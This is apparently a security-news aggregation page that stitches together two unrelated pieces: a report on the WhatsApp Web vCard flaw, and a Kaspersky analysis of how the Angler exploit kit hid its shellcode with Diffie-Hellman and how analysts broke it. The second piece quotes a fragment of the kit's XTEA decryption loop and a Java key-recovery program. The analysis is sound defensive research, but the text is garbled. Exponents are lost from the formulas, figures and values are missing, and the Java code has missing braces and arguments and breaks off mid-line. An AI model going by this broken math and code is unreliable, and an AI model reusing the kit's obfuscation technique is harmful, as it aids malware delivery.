200 Million WhatsApp Users Vulnerable to vCard Vulnerability


WhatsApp recently claimed to have hit 900 Million monthly active users, but a dangerous security flaw in the web version of the popular instant messaging app puts up to 200 Million of its users at risk.

Yes, the web-based extension of WhatsApp is vulnerable to an exploit that could allow hackers to trick users into downloading malware on their computers in a new and more sophisticated way.

WhatsApp made its web client, WhatsApp Web, available to iPhone users just last month, after first rolling out its web-based instant messaging service for Android, Windows and BlackBerry Phone earlier in the year.

Similar to Facebook Messenger, WhatsApp Web is an effective way to experience the mobile app in a web browser, allowing you to view all of the conversations you have made with your friends – including images, audio files, videos, GPS location and contact cards – straight on your PCs.

However, a security flaw discovered by Check Point's security researcher Kasif Dekel could allow hackers to compromise your machines by distributing malware including:
Remote Access Tools (RATs) – Give hackers remote access to the victim's PC
Ransomware – Forces victims to pay a ransom in order to regain access to their systems and personal data
Bots – Cause the machines to slow down to a crawl
Other malicious software

Here's How the WhatsApp Exploit Works

In order to exploit the vulnerability, all an attacker needs is to send a seemingly innocent vCard contact card containing a malicious code to a WhatsApp user, and, of course, the target's phone number.
"To target an individual, all an attacker needs is the phone number associated with the [WhatsApp] account," Oded Vanunu from Check Point wrote in a blog post on Tuesday.
According to the researcher, it is easy for anyone to create and send a .BAT file as a legit vCard that looks like any other message from a friend, but actually triggers a malicious code when clicked.

Once the vCard is opened in WhatsApp Web, the executable malicious code in the card runs on the target machine, further leaving the infected machine open to other attacks that could:
Take complete control over the target machine
Monitor user's activities
Use the target machine to spread viruses
The WhatsApp security team has verified and acknowledged the vulnerability and has rolled out an update to fix the issue in its web clients.

The flaw affects all versions of WhatsApp before V0.1.4481. So, users are advised to make sure that they are running the fully updated version of WhatsApp.

Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit

9.9.2015 Zdroj: Kaspersky

Exploit kit creators have been inventing increasingly interesting methods of masking their exploits, shellcodes, and payloads so that it is harder for analysts to define the type of the exploit and know what actions they may perform.

Several days ago analysts found the usage of the Diffie-Hellman cryptographic protocol in the Angler Exploit Kit, which is one of the most popular exploit kits at the moment. This protocol was developed more than 40 years ago, but that is the first known case of its usage in an exploit kit.

In Angler, threat actors used the Diffie-Hellman protocol to get a structure with the shellcode of one of the recent exploits for the CVE-2015-2419 vulnerability for the Internet Explorer 11 browser and then for the CVE-2015-5560 vulnerability exploit for Adobe Flash. Most likely, the goal of the threat actors was creating difficulties in firewall detection of the exploit (as firewalls cannot decipher a shellcode and exploit by the means of the intercepted traffic analysis) and also making it harder for the analysts to get the exploit code. However, the experts from Kaspersky Lab managed to perform a successful attack against Diffie-Hellman protocol implementation and decipher the shellcode.

Angler vs. Analysts

To make matters worse for analysts, JavaScript code and ActionScript code multiple obfuscation and a user IP ban upon sending the encrypted structure with a shellcode to the user were used in addition to the Diffie-Hellman protocol. After getting the structure with the shellcode by that means (encrypted with a one-time key by using the Diffie-Hellman protocol), the exploit kit sample becomes unusable after one processing: the analyst is unable to understand what a specific file does, reproduce the attack, and, quite often, identify the exploit and vulnerability at all.


There is a key exchange request in the picture above. As a response, a browser gets from the threat actors’ server an encrypted array that contains a shellcode to exploit the vulnerability. The same traffic request has been used to download the Flash vulnerability exploit.

As the secret for key generation is new each time, an analyst is unable to send it to the browser once more, reproduce the attack, and identify the vulnerability, even if he has the recorded traffic.

Diffie-Hellman Protocol Implementation Features

The used implementation of the Diffie-Hellman protocol includes the following:

1.The server generates a random number g (16 bytes) and sends the HTML page with the number g and JavaScript implementation of the Diffie-Hellman algorithm to the user’s browser.

2.JavaScript generates a random modulo p (16 bytes) and a random private key Ka (16 bytes) in the user’s browser, and then JavaScript calculates the public key A = gKa mod p and sends the three numbers (g, A, p) to the server as a JSON object along with the Internet browser version.


3.The server generates its own random private key Kb and its random encryption key Kx (16 bytes) and finds the Diffie-Hellman shared secret Kdh = AKb mod p. After that, the server encrypts the shellcode by using the XTEA algorithm and the key Kx, then base64_encode and urlencode, getting the string b as a result. Then, the key Kx is also encrypted by XTEA with the key Kdh, base64_encode, and urlencode, getting the string k as a result. And finally, the server calculates its public key B = gKb mod p and sends Base64-encrypted JSON object that contains B, k, and b to the browser:




After Base64 encryption removal:



4.A user’s browser calculates the Diffie-Hellman shared secret Kdh = BKa mod p, decrypts k urldecode, base64_decode, and XTEA by using the key Kdh, getting the key Kx, and eventually decrypts the urldecode, base64_decode, and XTEA shellcode by using the key Kx.


It is safe to assume that the aim of using the given sophisticated cryptographic system is shellcode interception prevention by listening to the Internet traffic between the server with the exploit kit and the user’s browser. We managed to perform a successful attack against the implementation of the encryption protocol and decrypt the shellcode. We used the modified Pohlig-Hellman algorithm for the attack (a deterministic algorithm of discrete logarithm-finding in the residue ring modulo a prime number).

According to the original algorithm, for the case when the Euler function expansion of the modulo p into prime factors qi is known (coprime factors Qi)


the complexity of finding the private key Ka and the Diffie-Hellman shared secret Kdh by using intercepted public keys A and B is


We used an optimized algorithm of finding the discrete logarithm in the residue ring modulo a prime number, taking into account the infinitesimality of logp with respect to qi, and low probability of occurrence of large prime factors raised to the power of greater than one in the Euler function φ(p); i.e., αi will equal one for large qi with a high probability. Owing to that, the complexity of the modified algorithm is


which allows us to perform a successful attack in case if all qi < 1018. The experiment has shown that the given condition is observed in more than a half of cases of using the aforementioned Diffie-Hellman protocol implementation (the case of randomly generated g, p, Ka, and Kb without their extra security checks).


Description of the Modified Pohlig-Hellman Algorithm

1.Let us find the expansion of the number p into prime factors (the factorization can be easily done with Cryptool):

p = 0x1b0b5c6e6b0b5b7e6c6d0b1b0a8c3c7e = 35948145881546650497425055363061529726 = 2 * 101 * 521 * 195197 * 7138079603 * 245150552958961933

2.Let us find the Euler function for the number p:

φ(p) = (2–1) * (101–1) * (521–1) * (195197–1) * (7138079603–1) * (245150552958961933–1) = 17761863220777184249809368812124288000

3.Let us find the expansion of the Euler function into prime factors:

φ(p) = 2^10 * 3^2 * 5^3 * 13 * 19 * 79 * 167 * 383 * 48799 * 45177719 * 5603527793

4.In order to find the browser’s private key Ka, it is necessary to find a discrete logarithm:

A = gKa mod p
A = 0x5eff90f1c48342f5d519cd02b5dfd8b = 7892150445281019518426774740123123083
g = 0x40a262b1360a6a16612ca8251161a9a5 = 14017453774474660607531272629759062185 (mod p)

As immediately finding Ka modulo φ(p) is quite time-consuming, let us find Ka by turns for each of the coprime factors Qi of the Euler function φ(p)

[1024, 9, 125, 13, 19, 79, 167, 383, 48799, 45177719, 5603527793],

and, by using the obtained results and the Chinese remainder theorem, let us immediately find Ka modulo φ(p).

5.In order to find Ka modulo Qi, it is necessary to find a discrete logarithm


To do that, we shall

5.1. take the number H=⌊√(Qi)⌋+1;
5.2. calculate Dc=DaH mod p;
5.3. make a sorted table of values Dcu mod p for 1 ≤ u ≤ H;
5.4. find such a value of 0 ≤ v ≤H, that the element Db ∙ Dav mod p is in the table;
5.5. The value of Ka modulo Qi equals Hu-v.

The implementation of the described algorithm in Java is given in the Appendix A. As in the reviewed example the maximum value of Qi is only several billions, the program execution time did not exceed several seconds.

For some of the Qi factors of the Euler function φ(p), there are several possible Ka values (there are possible Ka modulo Qi values in the row number i):











[834, 898, 962, 2, 842, 906, 970, 10, 850, 914, 978, 18, 858, 922, 986, 26, 866, 930, 994, 34, 874, 938, 1002, 42, 882, 946, 1010, 50, 890, 954, 1018, 58, 826]


[18, 68, 118, 43, 93]









6.By going over all of the possible combinations of obtained Ka values by using the Chinese remainder theorem, we find several tens of possible Ka modulo φ(p) values:



7.All of the obtained values of the private key Ka lead to the same value of the Diffie-Hellman shared secret Kdh = BKa mod p:


8.By knowing Kdh, it is possible to decrypt the encryption key Kx from k and the shellcode by using Kx. The PHP script for decrypting the intercepted shellcode by using the known Diffie-Hellman shared secret is given in the Appendix B. The decrypted shellcode is given in the Appendix C.

Testing of the Diffie-Hellman Protocol Implementation Attack in the Angler Exploit Kit

To test the effectiveness and functionality of the attack, several tests were conducted.

1.A test with a traffic dump from with the exploit for CVE-2015-2419.


{“B”:“481dbc66fe90ded2eb8d027395abe4fd”, …

p = 146455792068641286704746413745292278846 = 2 * 2269 * 1057223 * 1292823547 * 23612186462182360807

φ(p) = 73195553541542938096767116236244889696 = 2^5 * 3^6 * 7^3 * 17 * 617 * 7127 * 528611 * 231492024139042753

Owing to a significantly large factor φ(p) (about 1018), finding the Diffie-Hellman shared secret took several hours:


The decrypted shellcode is given in the Appendix D.

2.A test with a traffic dump from with the exploit for CVE-2015-2419 and CVE-2015-5560.

The new version of the Angler Exploit Kit has minor changes in the server-to-script communication protocol:



As compared with the previous version, indices “g”, “A”, “p”, “B”, “b”, and “k” were replaced by the parts of the number g, and the order of the numbers sent to the server was changed (now, it is g, p, A not g, A, p as it was before). Besides that, the XTEA algorithm had two constant values and used when decrypting the shellcode bit operation modified:

Before (the original XTEA implementation) After
for(var h=g[0],k=g[1],l=84941944608;0!=l;)
h-=(k<<4^k>>>5)+k^l+d[l&3]; for(var h=g[0],k=g[1],l=433284421593;0!=l;)
For the given traffic, we managed to factorize the Euler function φ(p)

p = 123758666691284322087508686576379854395 = 5 * 11 * 47 * 73 * 83 * 173 * 1055371 * 43277569507162384847671

φ(p) = 85339058418474058501009217357034700800 = 2^14 * 3^6 * 5^2 * 23 * 41 * 43 * 127 * 277 * 1949 * 102798053917762603

find the Diffie-Hellman shared secret


and decrypt the shellcode for CVE-2015-2419 (given in the Appendix E).

In addition to that, threat actors started to use the Diffie-Hellman key exchange pattern also for Flash exploits in the new version of the Angler Exploit Kit (i.e., the creators of the exploit kit programmed the same algorithms in PHP, JavaScript, and ActionScript). The protocol exploit and shellcode download format for the Flash vulnerability is the same as the one for the shellcode vulnerability for Internet Explorer:

Modulo p and the Euler function φ(p) factors:

p = 81152602799751951422044316006212054554 = 2 * 3 * 36329424479 * 10983441260369 * 33896452871009

φ(p) = 27050867599169456821145398677392574464 = 2^11 * 7 * 13 * 199 * 91279961 * 11640265409 * 686465078773

the Diffie-Hellman shared secret:


The decrypted exploit and shellcode for CVE-2015-5560 is given in the Appendix F.

Appendix A. The Diffie-Hellman Protocol Attack Implementation in Java



































































































import java.math.BigInteger;

import java.util.HashSet;

import java.util.Iterator;

import java.util.Set;

import java.util.TreeMap;

import java.util.Vector;



public class Test1 {


    static BigInteger p = new BigInteger(“1b0b5c6e6b0b5b7e6c6d0b1b0a8c3c7e”, 16);

    static BigInteger psi = new BigInteger(“17761863220777184249809368812124288000”);

    static BigInteger g = new BigInteger(“40a262b1360a6a16612ca8251161a9a5″, 16).mod(p);

    static BigInteger A = new BigInteger(“5eff90f1c48342f5d519cd02b5dfd8b”, 16);    

    static BigInteger B = new BigInteger(“02aa6526e6edc0042394b7ea81ec5b75″, 16);

    static long[] q = new long[]{1024L, 9L, 125L, 13L, 19L, 79L, 167L, 383L, 48799L, 45177719L, 5603527793L};


    static int q_len = q.length;

    static HashSet[] xi = new HashSet[q_len];

    static BigInteger ai[] = new BigInteger[q_len];

    static HashSet res = new HashSet();


    static void rec(int ind)


        if (ind == q_len)


            BigInteger x = BigInteger.ZERO;

            for(int i=0;i<q_len;i++)


                BigInteger mn = new BigInteger(((Long)q[i]).toString());

                BigInteger M = psi.divide(mn);

                x = x.add(ai[i].multiply(M).multiply(M.modInverse(mn)));


            res.add(B.modPow(x.mod(psi), p));





        Iterator<Long> it = xi[ind].iterator();


            ai[ind] = new BigInteger(;

            rec(ind + 1);




    public static void main(String[] args) {


        for(int i=0;i<q_len;i++)


            xi[i] = new HashSet<Long>();

            long qi = q[i];

            int H = (int)Math.sqrt((double)qi) + 1;


            BigInteger _a = g.modPow(psi